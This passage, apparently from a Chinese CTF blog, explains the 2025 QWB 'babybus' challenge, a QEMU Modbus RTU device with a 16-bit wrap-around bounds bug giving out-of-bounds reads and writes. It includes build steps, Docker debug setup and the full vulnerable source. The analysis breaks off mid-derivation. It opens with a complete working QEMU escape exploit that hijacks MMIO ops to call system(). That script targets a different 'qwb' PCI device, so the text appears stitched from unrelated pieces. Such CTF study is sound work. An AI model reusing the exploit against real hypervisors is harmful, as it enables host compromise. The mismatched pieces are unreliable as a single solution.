*import re, os, time, structcontext.log_level = 'debug' if os.getenv('DEBUG' ) else 'info' HEX = re.compile (r'0x[0-9a-fA-F]+' ) class QTest : def __init__ (self, argv=["./launch.sh" ], tmo=5.0 ): self .p = process(argv, shell=False ) self .tmo = float (os.getenv('QTEST_TMO' , tmo)) self ._drain_banner() @staticmethod def _strip_prefix (line: bytes ) -> str : s = line.decode('utf-8' , 'ignore' ).rstrip('\r\n' ) if s.startswith('[' ): rb = s.find(']' ) if rb != -1 : s = s[rb + 1 :].lstrip() return s def _drain_banner (self ): self .p.timeout = 0.1 try : while True : if not self .p.recvline(timeout=0.1 ): break except EOFError: pass finally : self .p.timeout = None def _flush_before_send (self ): self .p.timeout = 0.01 try : while True : l = self .p.recvline(timeout=0.01 ) if not l: break except EOFError: pass finally : self .p.timeout = None def _send (self, s: str ): self ._flush_before_send() self .p.sendline(s.encode()) def _read_resp (self, need_val=False ): """ 读到出现 OK 为止;兼容 'OK 0x...' 或 '0x...\\nOK'。 返回最后一个十六进制数(need_val=True)或 None。 """ val = None deadline = time.time() + self .tmo while True : if time.time() > deadline: raise RuntimeError("No reply from qtest" ) l = self .p.recvline() if not l: continue s = self ._strip_prefix(l) if not s: continue if 'FAIL' in s: raise RuntimeError(s) if need_val: ms = HEX.findall(s) if ms: val = int (ms[-1 ], 16 ) if s == 'OK' or s.startswith('OK' ): self ._flush_before_send() return val def writeq (self, addr, val ): self ._send(f"writeq {addr:#x} {val:#x} " ) self ._read_resp(False ) def readq (self, addr ): self ._send(f"readq {addr:#x} " ) return self ._read_resp(True ) def outl (self, port, val ): self ._send(f"outl {port:#x} {val:#x} " ) self ._read_resp(False ) def inl (self, port ): self ._send(f"inl {port:#x} " ) return self ._read_resp(True ) def mem_write (self, addr, data: bytes ): for i in range (0 , len (data), 8 ): chunk = data[i:i + 8 ] if len (chunk) < 8 : chunk += b'\x00' * (8 - len (chunk)) self .writeq(addr + i, struct.unpack('<Q' , chunk)[0 ]) def mem_write_qword (self, addr, qword ): self .writeq(addr, qword) def mem_read (self, addr, size ): out = bytearray () for i in range (0 , size, 8 ): out += struct.pack('<Q' , self .readq(addr + i)) return bytes (out[:size]) def pci_cfg_readl (self, bus, dev, fn, off ): cfg = 0x80000000 | (bus << 16 ) | (dev << 11 ) | (fn << 8 ) | (off & 0xfc ) self .outl(0xcf8 , cfg) return self .inl(0xcfc ) def pci_cfg_writel (self, bus, dev, fn, off, val ): cfg = 0x80000000 | (bus << 16 ) | (dev << 11 ) | (fn << 8 ) | (off & 0xfc ) self .outl(0xcf8 , cfg) self .outl(0xcfc , val) def find_qwb (self, ven=0x2021 , dev_id=0x0612 ): for d in range (32 ): for f in range (8 ): vdid = self .pci_cfg_readl(0 , d, f, 0x00 ) if vdid == ((dev_id << 16 ) | ven): return (0 , d, f) raise RuntimeError("qwb device not found on PCI 00:*.*" ) def get_bar0 (self, bus, dev, fn ): return self .pci_cfg_readl(bus, dev, fn, 0x10 ) & ~0xF def set_bar0 (self, bus, dev, fn, base ): self .pci_cfg_writel(bus, dev, fn, 0x10 , base) def enable_cmd_mem_busmaster (self, bus, dev, fn ): v = self .pci_cfg_readl(bus, dev, fn, 0x04 ) cmd = (v & 0xFFFF ) | 0x0006 v = (v & ~0xFFFF ) | cmd self .pci_cfg_writel(bus, dev, fn, 0x04 , v) def u64_neg (off ): """把正的偏移 k 变成 2^64 - k(等价于 -k 的无符号表示)""" return ((1 << 64 ) - (off & ((1 << 64 ) - 1 ))) & ((1 << 64 ) - 1 ) class QWB : def __init__ (self, qt: QTest, base=None ): self .qt = qt bus, dev, fn = qt.find_qwb() log.info(f"Found qwb at 00:{dev:02x} .{fn} " ) bar0 = qt.get_bar0(bus, dev, fn) if bar0 == 0 : map_base = int (os.getenv("MAP_BASE" , "0xf0000000" ), 16 ) log.warning(f"BAR0=0, programming BAR0 -> {map_base:#x} " ) qt.set_bar0(bus, dev, fn, map_base) qt.enable_cmd_mem_busmaster(bus, dev, fn) bar0 = qt.get_bar0(bus, dev, fn) if bar0 == 0 : log.warning("BAR0 readback still 0; using MAP_BASE as BASE anyway (qtest 有时不会回写)." ) bar0 = map_base else : qt.enable_cmd_mem_busmaster(bus, dev, fn) self .BASE = bar0 log.success(f"BAR0 = {self.BASE:#x} " ) self .REG_SIZE = self .BASE + 0x00 self .REG_IDX = self .BASE + 0x08 self .REG_SRC = self .BASE + 0x10 self .REG_DST = self .BASE + 0x18 self .REG_CNT = self .BASE + 0x20 self .REG_CMD = self .BASE + 0x28 self .REG_KICK = self .BASE + 0x30 v = self .go() if v != 1 : raise RuntimeError(f"MMIO not mapped? readq(BASE+0x30) -> {v:#x} , expect 1" ) log.info(f"SIZE(initial) = {self.get_size()} " ) def set_size (self, n ): self .qt.writeq(self .REG_SIZE, n) def get_size (self ): return self .qt.readq(self .REG_SIZE) def set_idx (self, i ): self .qt.writeq(self .REG_IDX, i) def wr_desc (self, i, src=None , dst=None , cnt=None , cmd=None ): self .set_idx(i) if src is not None : self .qt.writeq(self .REG_SRC, src) if dst is not None : self .qt.writeq(self .REG_DST, dst) if cnt is not None : self .qt.writeq(self .REG_CNT, cnt) if cmd is not None : self .qt.writeq(self .REG_CMD, cmd & 1 ) def go (self ): return self .qt.readq(self .REG_KICK) def oob_read_before (self, neg_off, nbytes, ram_out ): """ 从 dma_buf 起点往前 neg_off 字节开始,读取 nbytes 到来宾 RAM。 约束:0 < neg_off <= nbytes <= 0x1000 """ assert 0 < neg_off <= 0x1000 assert nbytes >= neg_off and nbytes <= 0x1000 self .set_size(1 ) self .wr_desc(0 , src=u64_neg(neg_off), dst=ram_out, cnt=nbytes, cmd=1 ) self .go() return self .qt.mem_read(ram_out, nbytes) def oob_write_before (self, neg_off, payload: bytes , ram_src=0x220000 , pad_byte=b'\x00' ): """ 从 dma_buf 起点往前 neg_off 字节开始,写入 payload。 为通过检查:需要 cnt >= neg_off 且 cnt <= 0x1000。 若 len(payload) < neg_off,会自动零填到 neg_off(会部分覆盖缓冲区内)。 """ assert 0 < neg_off <= 0x1000 cnt = max (len (payload), neg_off) assert cnt <= 0x1000 if len (payload) < cnt: payload = payload + pad_byte * (cnt - len (payload)) self .qt.mem_write(ram_src, payload) self .set_size(1 ) self .wr_desc(0 , src=ram_src, dst=u64_neg(neg_off), cnt=cnt, cmd=0 ) self .go() def find_qemu_pid (ppid ): try : exe = os.path.basename(os.readlink(f"/proc/{ppid} /exe" )) except Exception: return ppid if exe.startswith("qemu-system" ): return ppid try : with open (f"/proc/{ppid} /task/{ppid} /children" ) as f: kids = [int (x) for x in f.read().strip().split()] for k in kids: try : name = os.path.basename(os.readlink(f"/proc/{k} /exe" )) if name.startswith("qemu-system" ): return k except Exception: pass except Exception: pass return ppid def maybe_attach_gdb (proc ): if os.getenv('GDB' ): time.sleep(0.2 ) qpid = find_qemu_pid(proc.pid) gdbscript = os.getenv('GDBSCRIPT' , 'b system\nc\n' ) log.info(f"Attaching gdb to PID {qpid} " ) try : gdb.attach(qpid, gdbscript=gdbscript, exe="./qemu-system-x86_64" ) pause() except Exception as e: log.warning(f"GDB attach failed: {e} (tip: sudo sysctl -w kernel.yama.ptrace_scope=0)" ) def main (): qt = QTest(["./launch.sh" ]) qwb = QWB(qt, base=0xf0000000 ) qemu = ELF("./qemu-system-x86_64" ) leak = qwb.oob_read_before(neg_off=0x4b8 , nbytes=0x600 , ram_out=0x300000 ) print (hexdump(leak)) QWBState_addr = u64(leak[0x8 :0x8 + 8 ]) success("QWBState_addr: " + hex (QWBState_addr)) qemu.address = u64(leak[0x30 :0x30 + 8 ]) - qemu.sym['memory_region_destructor_none' ] success("qemu base: " + hex (qemu.address)) maybe_attach_gdb(qt.p) leak = bytearray (leak) leak[0 :8 ] = p64(QWBState_addr + 0xe00 ) qwb_mmio_ops = flat( p64(qemu.plt['system' ]), p64(qemu.plt['system' ]), p64(0 ), p64(0 ), p32(0 ), p32(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), p64(0 ), p32(4 ), p32(8 ), p32(0 ), p32(0 ), ) cmd = "/usr/bin/gnome-calculator" leak[0x4b8 :0x4b8 + len (qwb_mmio_ops)] = qwb_mmio_ops leak[0x4b8 + len (qwb_mmio_ops):0x4b8 + len (qwb_mmio_ops) + len (cmd)] = cmd.encode() leak[0x8 :0x8 + 8 ] = p64(QWBState_addr + 0xe00 + len (qwb_mmio_ops)) leak = bytes (leak) qwb.oob_write_before(neg_off=0x4b8 , payload=leak) pause() qwb.oob_write_before(neg_off=0x4b8 , payload=leak) qt.p.interactive() if __name__ == "__main__" : main()
2025qwb-babybus 环境搭建 编译 QEMU 由于题目没有符号,因此我们需要编译一个同版本的 QEMU,然后吧该 QEMU 二进制文件的签名以及结构体信息导入到题目提供的 QEMU 中。
通过运行程序或者搜索字符串可以定位到 QEMU 的版本是 10.1.0:
1 2 QEMU emulator version 10.1.0 (v10.1.0-2-g07e6d49-dirty) Copyright (c) 2003-2025 Fabrice Bellard and the QEMU Project developers
首先下载编译所需依赖:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 sudo sed -i 's/^# deb-src/deb-src/' /etc/apt/sources.listsudo apt updatesudo apt build-dep -y qemu sudo apt install -y git build-essential ninja-build meson pkg-config python3 \ libglib2.0-dev libpixman-1-dev zlib1g-dev libfdt-dev \ libsdl2-dev libgtk-3-dev libspice-server-dev libspice-protocol-dev \ libpulse-dev libasound2-dev libusb-1.0-0-dev libusbredirhost-dev libusbredirparser-dev \ libslirp-dev libiscsi-dev libnfs-dev libaio-dev liburing-dev libnuma-dev \ libzstd-dev liblz4-dev libsnappy-dev bzip2 libbz2-dev lzop liblzo2-dev \ libcapstone-dev libseccomp-dev libcap-ng-dev sudo apt install -y python3-venv python3-pip python3-setuptools python3-wheel
然后编译:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 mkdir -p ~/src && cd ~/srccurl -LO https://download.qemu.org/qemu-10.1.0.tar.xz tar -xf qemu-10.1.0.tar.xz cd ~/src/qemu-10.1.0rm -rf build-staticmkdir build-static && cd build-static../configure \ --prefix=$HOME /.local/qemu-10.1-static \ --target-list=x86_64-softmmu \ --disable-capstone --disable-slirp --disable-spice \ --disable-gtk --disable-sdl --disable-virglrenderer \ --disable-curl --disable-libssh --disable-libiscsi --disable-libnfs \ --disable-plugins --disable-tools \ --enable-debug --disable-strip \ --disable-pie \ -Ddefault_library=static \ -Db_pie=false \ -Dc_args='-fno-PIE' \ -Dc_link_args='-no-pie' ninja -C . qemu-system-x86_64
调试环境 Dockerfile 中需要添加 gdbserver 安装以及开放端口 2345:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 FROM ubuntu:24.04 RUN apt-get update && apt-get upgrade -y && \ apt-get install -y \ libglib2.0-0 \ libpixman-1-0 \ libusb-1.0-0 \ libgnutls30 \ libslirp0 \ libfdt1 \ gdbserver \ && rm -rf /var/lib/apt/lists/* COPY docker-entrypoint.sh /usr/local/bin/docker-entrypoint.sh RUN chmod +x /usr/local/bin/docker-entrypoint.sh RUN useradd -m ctf WORKDIR /home/ctf COPY qemu-system-x86_64 qemu-system-x86_64 COPY run.sh run.sh RUN chmod +x qemu-system-x86_64 run.sh USER ctfENV PORT=1502 EXPOSE 1502 EXPOSE 2345 ENTRYPOINT ["/usr/local/bin/docker-entrypoint.sh" ]
在入口脚本里增加一个 DEBUG_SERVER 模式 (监听 2345)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 #!/usr/bin/env sh FLAG_PATH=/home/ctf/flag FLAG_MODE=M_ECHO if [ ${ICQ_FLAG} ];then case $FLAG_MODE in "M_ECHO" ) echo -n ${ICQ_FLAG} > ${FLAG_PATH} FILE_MODE=755 chmod ${FILE_MODE} ${FLAG_PATH} ;; "M_SED" ) sed -i -r "s/flag\{.*\}/${ICQ_FLAG} /" ${FLAG_PATH} ;; "M_SQL" ) ;; *) ;; esac echo [+] ICQ_FLAG OK unset ICQ_FLAG else echo [!] no ICQ_FLAG fi rm -rf /etc/profile.d/pouchenv.shrm -rf /etc/instanceInfoset -euHOST="${HOST:-0.0.0.0} " PORT="${PORT:-1502} " RESTART_DELAY="${RESTART_DELAY:-1} " UNIT_ID="${UNIT_ID:-1} " TIMER_RESTART="${TIMER_RESTART:-20} " DEBUG_SERVER="${DEBUG_SERVER:-0} " GDB_PORT="${GDB_PORT:-2345} " DEBUG_AUTORESTART="${DEBUG_AUTORESTART:-0} " DEBUG_RESTART_DELAY="${DEBUG_RESTART_DELAY:-1} " if [ "$DEBUG_SERVER " = "1" ]; then echo "[entrypoint] DEBUG_SERVER=1: gdbserver on :$GDB_PORT (TIMER_RESTART disabled)" TIMER_RESTART=0 set +e while true ; do set -x gdbserver 0.0.0.0:${GDB_PORT} /home/ctf/qemu-system-x86_64 \ -machine none \ -nographic \ -nodefaults \ -chardev socket,id =mbus,host=0.0.0.0,port=1502,server=on,wait =off \ -device modbus-rtu,chardev=mbus,unit-id=1 exit_code=$? set +x if [ "${DEBUG_AUTORESTART} " != "1" ]; then echo "[entrypoint] gdbserver exited with code ${exit_code} , not restarting (DEBUG_AUTORESTART=0)" exit "${exit_code} " fi echo "[entrypoint] gdbserver exited with code ${exit_code} , restarting in ${DEBUG_RESTART_DELAY} s" sleep "${DEBUG_RESTART_DELAY} " done fi GEN_RUN="/home/ctf/run.sh" trap 'echo "[entrypoint] received signal, exiting"; exit 0' INT TERMstart_time=$(date +%s) while true ; do echo "[entrypoint] starting QEMU on ${HOST} :${PORT} " if [ "${TIMER_RESTART} " -gt 0 ]; then echo "[entrypoint] timer restart enabled: ${TIMER_RESTART} s" set +e timeout "${TIMER_RESTART} " "${GEN_RUN} " exit_code=$? set -e current_time=$(date +%s) runtime=$((current_time - start_time)) if [ $exit_code -eq 124 ]; then echo "[entrypoint] qemu timed out after ${TIMER_RESTART} s (runtime: ${runtime} s), restarting" else echo "[entrypoint] qemu exited with code ${exit_code} after ${runtime} s, restart in ${RESTART_DELAY} s" sleep "${RESTART_DELAY} " fi else set +e "${GEN_RUN} " exit_code=$? set -e current_time=$(date +%s) runtime=$((current_time - start_time)) echo "[entrypoint] qemu exited with code ${exit_code} after ${runtime} s, restart in ${RESTART_DELAY} s" sleep "${RESTART_DELAY} " fi start_time=$(date +%s) done
构建 Docker 镜像:
1 docker build -t babybus .
之后启动容器:
方便起见调试时可以采用如下命令循环启动:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 while true ; do docker run --rm -it \ --name babybus \ -e ICQ_FLAG=flag{fake_flag} \ -e DEBUG_SERVER=1 \ -p 1502:1502 -p 2345:2345 \ --cap-add=SYS_PTRACE \ --security-opt seccomp=unconfined \ babybus code=$? if [[ $code -eq 130 || $code -eq 143 ]]; then echo "收到中断,退出循环。" exit 0 fi echo "容器退出,状态码 $code ,2 秒后重启…(Ctrl+C 终止)" sleep 2 done
漏洞分析 题目是一个实现了 Modbus RTU 协议 交互的 QEMU 字符设备。
启动后,QEMU 不跑任何 CPU/系统镜像(-machine none -nodefaults),只注册并运行了一个自定义外设:modbus-rtu。它通过 QEMU 的 chardev socket 把这个外设挂到一个 TCP 端口(默认 1502) 上:
1 2 3 4 5 6 ./qemu-system-x86_64 \ -machine none \ -nographic \ -nodefaults \ -chardev socket,id =mbus,host=0.0.0.0,port=1502,server=on,wait =off \ -device modbus-rtu,chardev=mbus,unit-id=1
-machine none:没有虚拟机、没有 guest,只是一个设备在跑。
-chardev socket,server=on,host=0.0.0.0,port=1502:QEMU 开启 TCP 服务,监听 1502 端口,id 为 mbus。
-device modbus-rtu,chardev=mbus,unit-id=1:注册了一个 Modbus RTU 从站设备,从站地址(unit-id)为 1。并且设置 CharBackend 为前面定义的 mbus。
“监听网络端口”这件事根本不在设备代码里实现 ,而是在 QEMU 的 chardev 后端层 做的。你的设备代码只和一个“字符流”打交道,至于这个字符流是来自 TCP 端口、UNIX 套接字、PTY、管道还是 stdio,都由 -chardev 的后端类型 决定。
设备前端(FE) :你的 ModbusRtuState 里有一个 CharBackend chr;,并在 realize() 里调用:
qemu_chr_fe_set_handlers(&s->chr, ...) 注册回调(能读多少、收到数据、opened 事件)。
qemu_chr_fe_write_all(&s->chr, ...) 发数据。
后端(BE) :由命令行 -chardev ... ,id=XXX 创建,比如 socket、pty、pipe、file、stdio 等等。不同后端负责实际的 I/O :
-chardev socket,...,server=on,host=...,port=... → 监听 TCP 端口 ;
-chardev socket,...,path=/tmp/mbus.sock,server=on → 监听 UNIX 域套接字 ;
-chardev pty,id=... → 创建一个伪终端 ;
-chardev stdio,id=... → 走 QEMU 的标准输入输出 ;
……
然后你在设备上把两者绑定 起来:
1 -device modbus-rtu,chardev=XXX,unit-id=1
设备只知道有个 CharBackend 叫 XXX,背后具体是不是网络端口,它不关心。
题目完整代码如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 #include "qemu/osdep.h" #include "qapi/error.h" #include "hw/qdev-core.h" #include "qemu/module.h" #include "chardev/char-fe.h" #include "hw/qdev-properties.h" #include "qemu/bswap.h" #include "qemu/log.h" #define TYPE_MODBUS_RTU "modbus-rtu" OBJECT_DECLARE_SIMPLE_TYPE(ModbusRtuState, MODBUS_RTU) enum { MODBUS_FC_READ_HOLDING = 0x03 , MODBUS_FC_WRITE_MULTIPLE = 0x10 , }; enum { MODBUS_EX_ILLEGAL_FUNCTION = 0x01 , MODBUS_EX_ILLEGAL_DATA_ADDR = 0x02 , MODBUS_EX_ILLEGAL_DATA_VALUE = 0x03 , }; typedef struct ModbusRtuState { DeviceState parent_obj; CharBackend chr; uint8_t unit_id; uint16_t regs[256 ]; uint8_t rx_buf[260 ]; size_t rx_len; } ModbusRtuState; static inline uint16_t be16_load (const uint8_t *p) { return (uint16_t )((p[0 ] << 8 ) | p[1 ]); } static inline void be16_store (uint8_t *p, uint16_t v) { p[0 ] = (uint8_t )(v >> 8 ); p[1 ] = (uint8_t )(v & 0xFF ); } static uint16_t modbus_crc16 (const uint8_t *buf, size_t len) { uint16_t crc = 0xFFFF ; for (size_t i = 0 ; i < len; i++) { crc ^= buf[i]; for (int b = 0 ; b < 8 ; b++) { if (crc & 0x0001 ) { crc = (crc >> 1 ) ^ 0xA001 ; } else { crc >>= 1 ; } } } return crc; } static void modbus_send (ModbusRtuState *s, const uint8_t *buf, size_t len) { qemu_chr_fe_write_all(&s->chr, buf, len); } static void modbus_send_exception (ModbusRtuState *s, uint8_t addr, uint8_t func, uint8_t ex) { uint8_t out[5 ]; out[0 ] = addr; out[1 ] = (uint8_t )(func | 0x80 ); out[2 ] = ex; uint16_t crc = modbus_crc16(out, 3 ); out[3 ] = (uint8_t )(crc & 0xFF ); out[4 ] = (uint8_t )(crc >> 8 ); modbus_send(s, out, sizeof (out)); } static void modbus_handle_fc03 (ModbusRtuState *s, const uint8_t *req) { const uint8_t addr = req[0 ]; const uint16_t start = be16_load(&req[2 ]); const uint16_t count = be16_load(&req[4 ]); if (count == 0 || (uint16_t )(start + count) > 0x100 U) { modbus_send_exception(s, addr, MODBUS_FC_READ_HOLDING, MODBUS_EX_ILLEGAL_DATA_ADDR); return ; } uint8_t byte_count = count * 2 ; size_t out_len = 3 + byte_count + 2 ; uint8_t *out = g_malloc(out_len); out[0 ] = addr; out[1 ] = MODBUS_FC_READ_HOLDING; out[2 ] = byte_count; size_t p = 3 ; for (uint16_t i = 0 ; i < count; i++) { uint16_t v = s->regs[start + i]; out[p++] = (uint8_t )(v >> 8 ); out[p++] = (uint8_t )(v & 0xFF ); } uint16_t crc = modbus_crc16(out, out_len - 2 ); out[out_len - 2 ] = (uint8_t )(crc & 0xFF ); out[out_len - 1 ] = (uint8_t )(crc >> 8 ); modbus_send(s, out, out_len); g_free(out); } static void modbus_handle_fc10 (ModbusRtuState *s, const uint8_t *req) { const uint8_t addr = req[0 ]; const uint16_t start = be16_load(&req[2 ]); const uint16_t count = be16_load(&req[4 ]); const uint8_t byte_count = req[6 ]; if (count == 0 || (uint16_t )(start + count) > 0x100 U) { modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE, MODBUS_EX_ILLEGAL_DATA_ADDR); return ; } if (byte_count != 2 * count) { modbus_send_exception(s, addr, MODBUS_FC_WRITE_MULTIPLE, MODBUS_EX_ILLEGAL_DATA_VALUE); return ; } for (uint16_t i = 0 ; i < count; i++) { uint16_t v = be16_load(&req[7 + 2 * i]); s->regs[start + i] = v; } uint8_t out[8 ]; out[0 ] = addr; out[1 ] = MODBUS_FC_WRITE_MULTIPLE; be16_store(&out[2 ], start); be16_store(&out[4 ], count); uint16_t crc = modbus_crc16(out, 6 ); out[6 ] = (uint8_t )(crc & 0xFF ); out[7 ] = (uint8_t )(crc >> 8 ); modbus_send(s, out, sizeof (out)); } static bool modbus_try_parse (ModbusRtuState *s) { if (s->rx_len <= 3 ) { return false ; } const uint8_t *buf = s->rx_buf; const uint8_t addr = buf[0 ]; const uint8_t func = buf[1 ]; size_t need = 0 ; if (func == MODBUS_FC_READ_HOLDING) { need = 8 ; if (s->rx_len < need) { return false ; } } else if (func == MODBUS_FC_WRITE_MULTIPLE) { if (s->rx_len <= 6 ) { return false ; } need = (size_t )buf[6 ] + 9 ; if (s->rx_len < need) { return false ; } } else { if (s->rx_len <= 3 ) { return false ; } modbus_send_exception(s, addr, func, MODBUS_EX_ILLEGAL_FUNCTION); memmove(s->rx_buf, s->rx_buf + 1 , s->rx_len - 1 ); s->rx_len -= 1 ; return true ; } uint16_t rx_crc = (uint16_t )(buf[need - 2 ] | (buf[need - 1 ] << 8 )); uint16_t want = modbus_crc16(buf, need - 2 ); if (rx_crc != want) { memmove(s->rx_buf, s->rx_buf + 1 , s->rx_len - 1 ); s->rx_len -= 1 ; return true ; } if (addr == s->unit_id || addr == 0x00 ) { if (func == MODBUS_FC_READ_HOLDING) { modbus_handle_fc03(s, buf); } else if (func == MODBUS_FC_WRITE_MULTIPLE) { modbus_handle_fc10(s, buf); } } memmove(s->rx_buf, s->rx_buf + need, s->rx_len - need); s->rx_len -= need; return true ; } static int modbus_can_read (void *opaque) { ModbusRtuState *s = MODBUS_RTU(opaque); int cap = (int )(sizeof (s->rx_buf) - s->rx_len); return cap > 0 ? cap : 0 ; } static void modbus_read (void *opaque, const uint8_t *buf, int size) { ModbusRtuState *s = MODBUS_RTU(opaque); if (size <= 0 ) { return ; } size_t n = size; if (n > sizeof (s->rx_buf) - s->rx_len) { n = sizeof (s->rx_buf) - s->rx_len; } if (n) { memcpy (s->rx_buf + s->rx_len, buf, n); s->rx_len += n; } while (modbus_try_parse(s)) { } } static void modbus_event (void *opaque, QEMUChrEvent event) { ModbusRtuState *s = MODBUS_RTU(opaque); if (event == CHR_EVENT_OPENED) { s->rx_len = 0 ; } } static void modbus_realize (DeviceState *dev, Error **errp) { ModbusRtuState *s = MODBUS_RTU(dev); if (!qemu_chr_fe_backend_connected(&s->chr)) { error_setg(errp, "Can't create modbus-rtu device, empty char device" ); return ; } memset (s->regs, 0 , sizeof (s->regs)); s->rx_len = 0 ; qemu_chr_fe_set_handlers(&s->chr, modbus_can_read, modbus_read, modbus_event, s, NULL ); } static void modbus_unrealize (DeviceState *dev) { ModbusRtuState *s = MODBUS_RTU(dev); qemu_chr_fe_set_handlers(&s->chr, NULL , NULL , NULL , NULL , NULL ); } static Property modbus_properties[] = { DEFINE_PROP_CHR("chardev" , ModbusRtuState, chr), DEFINE_PROP_UINT8("unit-id" , ModbusRtuState, unit_id, 1 ), DEFINE_PROP_END_OF_LIST(), }; static void modbus_class_init (ObjectClass *klass, void *data) { DeviceClass *dc = DEVICE_CLASS(klass); dc->realize = modbus_realize; dc->unrealize = modbus_unrealize; device_class_set_props(dc, modbus_properties); } static const TypeInfo modbus_type_info = { .name = TYPE_MODBUS_RTU, .parent = TYPE_DEVICE, .instance_size = sizeof (ModbusRtuState), .class_init = modbus_class_init, }; static void modbus_register_types (void ) { type_register_static(&modbus_type_info); } type_init(modbus_register_types);
核心错误 :代码把合法范围理解为“**(start + count) ≤ 0x100(256)”,但 比较时做了 16 位截断**:
1 (uint16_t )(start + count) <= 0x100
这意味着你可以选一个很大的 start (例如接近 0xFFFF),再配一个小 count,让 (start + count) & 0xFFFF 环回(wrap-around)到一个很小的数 ,从而骗过检查 。 然而真正读/写时用的是 s->regs[start + i](即按 真实的 start做索引),相当于对 256 大小的数组做了 巨大正偏移 ,从而读/写“数组之外”的内存 。
直观图(单位:字节;regs 占 512B)
1 2 3 4 |<-------------- ModbusRtuState(设备对象,堆上)----------------------------->| ... [ regs: 512 bytes ] ... [ 其他字段 / 其他堆块 / 其他映射 ... ] ^基址 = regs_base 访问地址 = regs_base + 2*(start + i)
只要 2*(start + i) 远大于 512,就会“落到”regs 之后的其它内存(同一堆 arena 的别的对象/元数据/指针 ),从而形成:
0x03:越界读(OOB Read) —— 把外部内存读出来并打包发回;
0x10:越界写(OOB Write) —— 把请求中的字节写到外部内存;配合 0x03 可做二次泄露 或直接破坏对象/堆 。
0x03:越界读 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 static void modbus_handle_fc03 (ModbusRtuState *s, const uint8_t *req) { const uint8_t addr = req[0 ]; const uint16_t start = be16_load(&req[2 ]); const uint16_t count = be16_load(&req[4 ]); if (count == 0 || (uint16_t )(start + count) > 0x100 U) { modbus_send_exception(s, addr, MODBUS_FC_READ_HOLDING, MODBUS_EX_ILLEGAL_DATA_ADDR); return ; } uint8_t byte_count = count * 2 ; size_t out_len = 3 + byte_count + 2 ; uint8_t *out = g_malloc(out_len); out[0 ] = addr; out[1 ] = MODBUS_FC_READ_HOLDING; out[2 ] = byte_count; size_t p = 3 ; for (uint16_t i = 0 ; i < count; i++) { uint16_t v = s->regs[start + i]; out[p++] = (uint8_t )(v >> 8 ); out[p++] = (uint8_t )(v & 0xFF ); } uint16_t crc = modbus_crc16(out, out_len - 2 ); out[out_len - 2 ] = (uint8_t )(crc & 0xFF ); out[out_len - 1 ] = (uint8_t )(crc >> 8 ); modbus_send(s, out, out_len); g_free(out); }
每个寄存器 2 字节,读 count 个寄存器,读取字节区间 = [2*start, 2*(start + count - 1)](相对 regs_base)。
读取数据时使用的 start 和 count 需要满足如下条件:
通过地址检查 :count >= 1 且 (uint16_t)(start + count) <= 0x100 (16 位环回)
避免堆溢出 :由于回包分配长度用 byte_count = (uint8_t)(2*count),当 count ≥ 128 时会少分配 导致堆溢出 。我们若只想“稳定泄露而不崩”,取 count ≤ 127 即可。
代码允许处理当且仅当:
c o u n t ≥ 1 且 ( ( s t a r t + c o u n t ) m o d 2 16 ) ≤ 256.
\mathbf{count}\ \ge\ 1
\quad\text{且}\quad
\bigl((\mathbf{start}+\mathbf{count}) \bmod 2^{16}\bigr)\ \le\ 256.
count ≥ 1 且 ( ( start + count ) mod 2 16 ) ≤ 256.
把条件改写为允许的 start 取值集合(对固定的 count):
s t a r t ∈ [ − c o u n t , 256 − c o u n t ] ( m o d 2 16 )
\boxed{\
\mathbf{start}\ \in\ \bigl[-\mathbf{count},\ 256-\mathbf{count}\bigr]\ \ (\bmod\ 2^{16})\
}
start ∈ [ − count , 256 − count ] ( mod 2 16 )
进一步按 count 的大小描述为具体区间:
s t a r t ∈ [ 0 , 256 − c o u n t ] ∪ [ 65536 − c o u n t , 65535 ] .
